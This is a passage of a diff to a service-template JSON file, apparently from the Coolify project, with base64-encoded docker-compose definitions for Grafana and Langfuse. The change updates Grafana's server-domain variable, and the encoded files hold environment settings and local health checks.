         "documentation": "https://grafana.com?utm_source=coolify.io",
         "slogan": "Grafana is the open source analytics & monitoring solution for every database.",
-        "compose": "c2VydmljZXM6CiAgZ3JhZmFuYToKICAgIGltYWdlOiBncmFmYW5hL2dyYWZhbmEtb3NzCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9HUkFGQU5BXzMwMDAKICAgICAgLSAnR0ZfU0VSVkVSX1JPT1RfVVJMPSR7U0VSVklDRV9VUkxfR1JBRkFOQX0nCiAgICAgIC0gJ0dGX1NFUlZFUl9ET01BSU49JHtTRVJWSUNFX1VSTF9HUkFGQU5BfScKICAgICAgLSAnR0ZfU0VDVVJJVFlfQURNSU5fUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0dSQUZBTkF9JwogICAgICAtIEdGX0RBVEFCQVNFX1RZUEU9cG9zdGdyZXMKICAgICAgLSBHRl9EQVRBQkFTRV9IT1NUPXBvc3RncmVzcWwKICAgICAgLSBHRl9EQVRBQkFTRV9VU0VSPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBHRl9EQVRBQkFTRV9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9QT1NUR1JFUwogICAgICAtICdHRl9EQVRBQkFTRV9OQU1FPSR7UE9TVEdSRVNfREI6LWdyYWZhbmF9JwogICAgdm9sdW1lczoKICAgICAgLSAnZ3JhZmFuYS1kYXRhOi92YXIvbGliL2dyYWZhbmEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gY3VybAogICAgICAgIC0gJy1mJwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6MzAwMC9hcGkvaGVhbHRoJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgICBkZXBlbmRzX29uOgogICAgICAtIHBvc3RncmVzcWwKICBwb3N0Z3Jlc3FsOgogICAgaW1hZ2U6ICdwb3N0Z3JlczoxNi1hbHBpbmUnCiAgICB2b2x1bWVzOgogICAgICAtICdwb3N0Z3Jlc3FsLWRhdGE6L3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gUE9TVEdSRVNfVVNFUj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gUE9TVEdSRVNfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotZ3JhZmFuYX0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3BnX2lzcmVhZHkgLVUgJCR7UE9TVEdSRVNfVVNFUn0gLWQgJCR7UE9TVEdSRVNfREJ9JwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCg==",
+        "compose": "c2VydmljZXM6CiAgZ3JhZmFuYToKICAgIGltYWdlOiBncmFmYW5hL2dyYWZhbmEtb3NzCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9HUkFGQU5BXzMwMDAKICAgICAgLSAnR0ZfU0VSVkVSX1JPT1RfVVJMPSR7U0VSVklDRV9VUkxfR1JBRkFOQX0nCiAgICAgIC0gJ0dGX1NFUlZFUl9ET01BSU49JHtTRVJWSUNFX0ZRRE5fR1JBRkFOQX0nCiAgICAgIC0gJ0dGX1NFQ1VSSVRZX0FETUlOX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9HUkFGQU5BfScKICAgICAgLSBHRl9EQVRBQkFTRV9UWVBFPXBvc3RncmVzCiAgICAgIC0gR0ZfREFUQUJBU0VfSE9TVD1wb3N0Z3Jlc3FsCiAgICAgIC0gR0ZfREFUQUJBU0VfVVNFUj0kU0VSVklDRV9VU0VSX1BPU1RHUkVTCiAgICAgIC0gR0ZfREFUQUJBU0VfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSAnR0ZfREFUQUJBU0VfTkFNRT0ke1BPU1RHUkVTX0RCOi1ncmFmYW5hfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2dyYWZhbmEtZGF0YTovdmFyL2xpYi9ncmFmYW5hJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICctZicKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjMwMDAvYXBpL2hlYWx0aCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogICAgZGVwZW5kc19vbjoKICAgICAgLSBwb3N0Z3Jlc3FsCiAgcG9zdGdyZXNxbDoKICAgIGltYWdlOiAncG9zdGdyZXM6MTYtYWxwaW5lJwogICAgdm9sdW1lczoKICAgICAgLSAncG9zdGdyZXNxbC1kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgIGVudmlyb25tZW50OgogICAgICAtIFBPU1RHUkVTX1VTRVI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIFBPU1RHUkVTX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICAgIC0gJ1BPU1RHUkVTX0RCPSR7UE9TVEdSRVNfREI6LWdyYWZhbmF9JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdwZ19pc3JlYWR5IC1VICQke1BPU1RHUkVTX1VTRVJ9IC1kICQke1BPU1RHUkVTX0RCfScKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=",
         "tags": [
             "grafana",
             "analytics",
@@ -1862,7 +1878,7 @@
     "grafana": {
         "documentation": "https://grafana.com?utm_source=coolify.io",
         "slogan": "Grafana is the open source analytics & monitoring solution for every database.",
-        "compose": "c2VydmljZXM6CiAgZ3JhZmFuYToKICAgIGltYWdlOiBncmFmYW5hL2dyYWZhbmEtb3NzCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9HUkFGQU5BXzMwMDAKICAgICAgLSAnR0ZfU0VSVkVSX1JPT1RfVVJMPSR7U0VSVklDRV9VUkxfR1JBRkFOQX0nCiAgICAgIC0gJ0dGX1NFUlZFUl9ET01BSU49JHtTRVJWSUNFX1VSTF9HUkFGQU5BfScKICAgICAgLSAnR0ZfU0VDVVJJVFlfQURNSU5fUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0dSQUZBTkF9JwogICAgdm9sdW1lczoKICAgICAgLSAnZ3JhZmFuYS1kYXRhOi92YXIvbGliL2dyYWZhbmEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gY3VybAogICAgICAgIC0gJy1mJwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6MzAwMC9hcGkvaGVhbHRoJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCg==",
+        "compose": "c2VydmljZXM6CiAgZ3JhZmFuYToKICAgIGltYWdlOiBncmFmYW5hL2dyYWZhbmEtb3NzCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9HUkFGQU5BXzMwMDAKICAgICAgLSAnR0ZfU0VSVkVSX1JPT1RfVVJMPSR7U0VSVklDRV9VUkxfR1JBRkFOQX0nCiAgICAgIC0gJ0dGX1NFUlZFUl9ET01BSU49JHtTRVJWSUNFX0ZRRE5fR1JBRkFOQX0nCiAgICAgIC0gJ0dGX1NFQ1VSSVRZX0FETUlOX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9HUkFGQU5BfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2dyYWZhbmEtZGF0YTovdmFyL2xpYi9ncmFmYW5hJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICctZicKICAgICAgICAtICdodHRwOi8vMTI3LjAuMC4xOjMwMDAvYXBpL2hlYWx0aCcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=",
         "tags": [
             "grafana",
             "analytics",
@@ -2356,7 +2372,7 @@
     "langfuse": {
         "documentation": "https://langfuse.com/docs?utm_source=coolify.io",
         "slogan": "Langfuse is an open-source LLM engineering platform that helps teams collaboratively debug, analyze, and iterate on their LLM applications.",
-        "compose": "eC1hcHAtZW52OgogIC0gJ05FWFRBVVRIX1VSTD0ke1NFUlZJQ0VfVVJMX0xBTkdGVVNFfScKICAtICdEQVRBQkFTRV9VUkw9cG9zdGdyZXNxbDovLyR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfToke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QHBvc3RncmVzOjU0MzIvJHtQT1NUR1JFU19EQjotbGFuZ2Z1c2UtZGJ9JwogIC0gJ1NBTFQ9JHtTRVJWSUNFX1BBU1NXT1JEX1NBTFR9JwogIC0gJ0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9QQVNTV09SRF82NF9MQU5HRlVTRX0nCiAgLSAnVEVMRU1FVFJZX0VOQUJMRUQ9JHtURUxFTUVUUllfRU5BQkxFRDotZmFsc2V9JwogIC0gJ0xBTkdGVVNFX0VOQUJMRV9FWFBFUklNRU5UQUxfRkVBVFVSRVM9JHtMQU5HRlVTRV9FTkFCTEVfRVhQRVJJTUVOVEFMX0ZFQVRVUkVTOi1mYWxzZX0nCiAgLSAnQ0xJQ0tIT1VTRV9NSUdSQVRJT05fVVJMPWNsaWNraG91c2U6Ly9jbGlja2hvdXNlOjkwMDAnCiAgLSAnQ0xJQ0tIT1VTRV9VUkw9aHR0cDovL2NsaWNraG91c2U6ODEyMycKICAtICdDTElDS0hPVVNFX1VTRVI9JHtTRVJWSUNFX1VTRVJfQ0xJQ0tIT1VTRX0nCiAgLSAnQ0xJQ0tIT1VTRV9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfQ0xJQ0tIT1VTRX0nCiAgLSBDTElDS0hPVVNFX0NMVVNURVJfRU5BQkxFRD1mYWxzZQogIC0gJ0xBTkdGVVNFX1VTRV9BWlVSRV9CTE9CPSR7TEFOR0ZVU0VfVVNFX0FaVVJFX0JMT0I6LWZhbHNlfScKICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0JVQ0tFVDotbGFuZ2Z1c2V9JwogIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9SRUdJT049JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUkVHSU9OOi1hdXRvfScKICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQUNDRVNTX0tFWV9JRD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9BQ0NFU1NfS0VZX0lEfScKICAtICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVl9JwogIC0gJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVH0nCiAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRTotdHJ1ZX0nCiAgLSAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1BSRUZJWD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9QUkVGSVg6LWV2ZW50cy99JwogIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQlVDS0VUOi1sYW5nZnVzZX0nCiAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1JFR0lPTj0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9SRUdJT046LWF1dG99JwogIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0FDQ0VTU19LRVlfSUR9JwogIC0gJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgLSAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0VORFBPSU5UPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0VORFBPSU5UfScKICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAtICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUFJFRklYPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1BSRUZJWDotbWVkaWEvfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5BQkxFRD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkFCTEVEOi1mYWxzZX0nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0JVQ0tFVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9CVUNLRVQ6LWxhbmdmdXNlfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUFJFRklYPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1BSRUZJWDotZXhwb3J0cy99JwogIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9SRUdJT049JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUkVHSU9OOi1hdXRvfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlR9JwogIC0gJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVH0nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQUNDRVNTX0tFWV9JRH0nCiAgLSAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAtICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAtICdMQU5HRlVTRV9JTkdFU1RJT05fUVVFVUVfREVMQVlfTVM9JHtMQU5HRlVTRV9JTkdFU1RJT05fUVVFVUVfREVMQVlfTVM6LTF9JwogIC0gJ0xBTkdGVVNFX0lOR0VTVElPTl9DTElDS0hPVVNFX1dSSVRFX0lOVEVSVkFMX01TPSR7TEFOR0ZVU0VfSU5HRVNUSU9OX0NMSUNLSE9VU0VfV1JJVEVfSU5URVJWQUxfTVM6LTEwMDB9JwogIC0gUkVESVNfSE9TVD1yZWRpcwogIC0gUkVESVNfUE9SVD02Mzc5CiAgLSAnUkVESVNfQVVUSD0ke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogIC0gJ0VNQUlMX0ZST01fQUREUkVTUz0ke0VNQUlMX0ZST01fQUREUkVTUzotYWRtaW5AZXhhbXBsZS5jb219JwogIC0gJ1NNVFBfQ09OTkVDVElPTl9VUkw9JHtTTVRQX0NPTk5FQ1RJT05fVVJMOi19JwogIC0gJ05FWFRBVVRIX1NFQ1JFVD0ke1NFUlZJQ0VfQkFTRTY0X05FWFRBVVRIU0VDUkVUfScKICAtICdBVVRIX0RJU0FCTEVfU0lHTlVQPSR7QVVUSF9ESVNBQkxFX1NJR05VUDotdHJ1ZX0nCiAgLSAnSE9TVE5BTUU9JHtIT1NUTkFNRTotMC4wLjAuMH0nCiAgLSAnTEFOR0ZVU0VfSU5JVF9PUkdfSUQ9JHtMQU5HRlVTRV9JTklUX09SR19JRDotbXktb3JnfScKICAtICdMQU5HRlVTRV9JTklUX09SR19OQU1FPSR7TEFOR0ZVU0VfSU5JVF9PUkdfTkFNRTotTXkgT3JnfScKICAtICdMQU5HRlVTRV9JTklUX1BST0pFQ1RfSUQ9JHtMQU5HRlVTRV9JTklUX1BST0pFQ1RfSUQ6LW15LXByb2plY3R9JwogIC0gJ0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9OQU1FPSR7TEFOR0ZVU0VfSU5JVF9QUk9KRUNUX05BTUU6LU15IFByb2plY3R9JwogIC0gJ0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTD0ke0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTDotYWRtaW5AZXhhbXBsZS5jb219JwogIC0gJ0xBTkdGVVNFX0lOSVRfVVNFUl9OQU1FPSR7U0VSVklDRV9VU0VSX0xBTkdGVVNFfScKICAtICdMQU5HRlVTRV9JTklUX1VTRVJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0xBTkdGVVNFfScKc2VydmljZXM6CiAgbGFuZ2Z1c2U6CiAgICBpbWFnZTogJ2xhbmdmdXNlL2xhbmdmdXNlOjMnCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBjbGlja2hvdXNlOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBlbnZpcm9ubWVudDoKICAgICAgMDogJ05FWFRBVVRIX1VSTD0ke1NFUlZJQ0VfVVJMX0xBTkdGVVNFfScKICAgICAgMTogJ0RBVEFCQVNFX1VSTD1wb3N0Z3Jlc3FsOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AcG9zdGdyZXM6NTQzMi8ke1BPU1RHUkVTX0RCOi1sYW5nZnVzZS1kYn0nCiAgICAgIDI6ICdTQUxUPSR7U0VSVklDRV9QQVNTV09SRF9TQUxUfScKICAgICAgMzogJ0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9QQVNTV09SRF82NF9MQU5HRlVTRX0nCiAgICAgIDQ6ICdURUxFTUVUUllfRU5BQkxFRD0ke1RFTEVNRVRSWV9FTkFCTEVEOi1mYWxzZX0nCiAgICAgIDU6ICdMQU5HRlVTRV9FTkFCTEVfRVhQRVJJTUVOVEFMX0ZFQVRVUkVTPSR7TEFOR0ZVU0VfRU5BQkxFX0VYUEVSSU1FTlRBTF9GRUFUVVJFUzotZmFsc2V9JwogICAgICA2OiAnQ0xJQ0tIT1VTRV9NSUdSQVRJT05fVVJMPWNsaWNraG91c2U6Ly9jbGlja2hvdXNlOjkwMDAnCiAgICAgIDc6ICdDTElDS0hPVVNFX1VSTD1odHRwOi8vY2xpY2tob3VzZTo4MTIzJwogICAgICA4OiAnQ0xJQ0tIT1VTRV9VU0VSPSR7U0VSVklDRV9VU0VSX0NMSUNLSE9VU0V9JwogICAgICA5OiAnQ0xJQ0tIT1VTRV9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfQ0xJQ0tIT1VTRX0nCiAgICAgIDEwOiBDTElDS0hPVVNFX0NMVVNURVJfRU5BQkxFRD1mYWxzZQogICAgICAxMTogJ0xBTkdGVVNFX1VTRV9BWlVSRV9CTE9CPSR7TEFOR0ZVU0VfVVNFX0FaVVJFX0JMT0I6LWZhbHNlfScKICAgICAgMTI6ICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQlVDS0VUPSR7TEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0JVQ0tFVDotbGFuZ2Z1c2V9JwogICAgICAxMzogJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9SRUdJT049JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfUkVHSU9OOi1hdXRvfScKICAgICAgMTQ6ICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfQUNDRVNTX0tFWV9JRD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9BQ0NFU1NfS0VZX0lEfScKICAgICAgMTU6ICdMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVk9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfU0VDUkVUX0FDQ0VTU19LRVl9JwogICAgICAxNjogJ0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9FTkRQT0lOVH0nCiAgICAgIDE3OiAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX0ZPUkNFX1BBVEhfU1RZTEU9JHtMQU5HRlVTRV9TM19FVkVOVF9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRTotdHJ1ZX0nCiAgICAgIDE4OiAnTEFOR0ZVU0VfUzNfRVZFTlRfVVBMT0FEX1BSRUZJWD0ke0xBTkdGVVNFX1MzX0VWRU5UX1VQTE9BRF9QUkVGSVg6LWV2ZW50cy99JwogICAgICAxOTogJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9CVUNLRVQ9JHtMQU5HRlVTRV9TM19NRURJQV9VUExPQURfQlVDS0VUOi1sYW5nZnVzZX0nCiAgICAgIDIwOiAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1JFR0lPTj0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9SRUdJT046LWF1dG99JwogICAgICAyMTogJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9BQ0NFU1NfS0VZX0lEPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0FDQ0VTU19LRVlfSUR9JwogICAgICAyMjogJ0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9TRUNSRVRfQUNDRVNTX0tFWX0nCiAgICAgIDIzOiAnTEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0VORFBPSU5UPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX0VORFBPSU5UfScKICAgICAgMjQ6ICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX01FRElBX1VQTE9BRF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgMjU6ICdMQU5HRlVTRV9TM19NRURJQV9VUExPQURfUFJFRklYPSR7TEFOR0ZVU0VfUzNfTUVESUFfVVBMT0FEX1BSRUZJWDotbWVkaWEvfScKICAgICAgMjY6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5BQkxFRD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FTkFCTEVEOi1mYWxzZX0nCiAgICAgIDI3OiAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0JVQ0tFVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9CVUNLRVQ6LWxhbmdmdXNlfScKICAgICAgMjg6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUFJFRklYPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1BSRUZJWDotZXhwb3J0cy99JwogICAgICAyOTogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9SRUdJT049JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfUkVHSU9OOi1hdXRvfScKICAgICAgMzA6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRU5EUE9JTlR9JwogICAgICAzMTogJ0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVD0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9FWFRFUk5BTF9FTkRQT0lOVH0nCiAgICAgIDMyOiAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX0FDQ0VTU19LRVlfSUQ9JHtMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfQUNDRVNTX0tFWV9JRH0nCiAgICAgIDMzOiAnTEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZPSR7TEFOR0ZVU0VfUzNfQkFUQ0hfRVhQT1JUX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAgICAgMzQ6ICdMQU5HRlVTRV9TM19CQVRDSF9FWFBPUlRfRk9SQ0VfUEFUSF9TVFlMRT0ke0xBTkdGVVNFX1MzX0JBVENIX0VYUE9SVF9GT1JDRV9QQVRIX1NUWUxFOi10cnVlfScKICAgICAgMzU6ICdMQU5HRlVTRV9JTkdFU1RJT05fUVVFVUVfREVMQVlfTVM9JHtMQU5HRlVTRV9JTkdFU1RJT05fUVVFVUVfREVMQVlfTVM6LTF9JwogICAgICAzNjogJ0xBTkdGVVNFX0lOR0VTVElPTl9DTElDS0hPVVNFX1dSSVRFX0lOVEVSVkFMX01TPSR7TEFOR0ZVU0VfSU5HRVNUSU9OX0NMSUNLSE9VU0VfV1JJVEVfSU5URVJWQUxfTVM6LTEwMDB9JwogICAgICAzNzogUkVESVNfSE9TVD1yZWRpcwogICAgICAzODogUkVESVNfUE9SVD02Mzc5CiAgICAgIDM5OiAnUkVESVNfQVVUSD0ke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9JwogICAgICA0MDogJ0VNQUlMX0ZST01fQUREUkVTUz0ke0VNQUlMX0ZST01fQUREUkVTUzotYWRtaW5AZXhhbXBsZS5jb219JwogICAgICA0MTogJ1NNVFBfQ09OTkVDVElPTl9VUkw9JHtTTVRQX0NPTk5FQ1RJT05fVVJMOi19JwogICAgICA0MjogJ05FWFRBVVRIX1NFQ1JFVD0ke1NFUlZJQ0VfQkFTRTY0X05FWFRBVVRIU0VDUkVUfScKICAgICAgNDM6ICdBVVRIX0RJU0FCTEVfU0lHTlVQPSR7QVVUSF9ESVNBQkxFX1NJR05VUDotdHJ1ZX0nCiAgICAgIDQ0OiAnSE9TVE5BTUU9JHtIT1NUTkFNRTotMC4wLjAuMH0nCiAgICAgIDQ1OiAnTEFOR0ZVU0VfSU5JVF9PUkdfSUQ9JHtMQU5HRlVTRV9JTklUX09SR19JRDotbXktb3JnfScKICAgICAgNDY6ICdMQU5HRlVTRV9JTklUX09SR19OQU1FPSR7TEFOR0ZVU0VfSU5JVF9PUkdfTkFNRTotTXkgT3JnfScKICAgICAgNDc6ICdMQU5HRlVTRV9JTklUX1BST0pFQ1RfSUQ9JHtMQU5HRlVTRV9JTklUX1BST0pFQ1RfSUQ6LW15LXByb2plY3R9JwogICAgICA0ODogJ0xBTkdGVVNFX0lOSVRfUFJPSkVDVF9OQU1FPSR7TEFOR0ZVU0VfSU5JVF9QUk9KRUNUX05BTUU6LU15IFByb2plY3R9JwogICAgICA0OTogJ0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTD0ke0xBTkdGVVNFX0lOSVRfVVNFUl9FTUFJTDotYWRtaW5AZXhhbXBsZS5jb219JwogICAgICA1MDogJ0xBTkdGVVNFX0lOSVRfVVNFUl9OQU1FPSR7U0VSVklDRV9VU0VSX0xBTkdGVVNFfScKICAgICAgNTE6ICdMQU5HRlVTRV9JTklUX1VTRVJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX0xBTkdGVVNFfScKICAgICAgU0VSVklDRV9VUkxfTEFOR0ZVU0VfMzAwMDogJyR7U0VSVklDRV9VUkxfTEFOR0ZVU0VfMzAwMH0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gd2dldAogICAgICAgIC0gJy1xJwogICAgICAgIC0gJy0tc3BpZGVyJwogICAg